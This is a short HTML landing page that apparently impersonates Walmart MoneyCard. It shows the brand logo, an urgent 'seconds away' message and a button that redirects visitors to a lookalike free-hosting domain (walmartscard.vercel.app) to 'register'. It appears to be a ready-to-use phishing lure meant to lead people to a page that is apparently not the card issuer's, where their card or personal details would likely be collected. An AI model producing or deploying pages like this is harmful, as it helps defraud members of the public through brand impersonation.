<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>MoneyCard</title>
    <style>
      * {
        margin: 0;
        padding: 0;
        box-sizing: border-box;
        font-family: "Roboto", sans-serif;
      }

      body {
        display: flex;
        flex-direction: column;
        height: 100vh;
        background-color: #f9f9f9;
      }

      nav {
        background-color: white;
        padding: 10px 20px;
        display: flex;
        justify-content: space-between;
        align-items: center;
      }

      .logo {
        display: flex;
        align-items: center;
        color: #fff;
        font-size: 18px;
        font-weight: bold;
      }

      .logo img {
        height: 80px;
        margin-right: 10px;
      }

      .logo span {
        color: #ffcc00;
      }

      .card-container {
        display: flex;
        justify-content: center;
        align-items: center;
        flex-grow: 1;
      }

      .card {
        background-color: #f1f1f1;
        padding: 30px;
        border-radius: 8px;
        box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
        width: 90%;
        max-width: 600px;
      }

      .card h1 {
        font-size: 28px;
        font-weight: bold;
        margin-bottom: 3rem;
      }
      .button {
        background-color: #005eb8;
        color: #fff;
        padding: 10px;
        width: 100%;
        border: none;
        border-radius: 4px;
        font-size: 18px;
        cursor: pointer;
      }
    </style>
  </head>
  <body>
    <nav>
      <div class="logo">
        <img src="logo.svg" alt="Walmart MoneyCard" />
      </div>
    </nav>
    <div class="card-container">
      <div class="card">
        <h1>You are seconds away from using your new Walmart MoneyCard!</h1>
        <button
          class="button"
          onclick="window.location.href='https://walmartscard.vercel.app/';"
        >
          Continue to register now !!
        </button>
      </div>
    </div>
  </body>
</html>
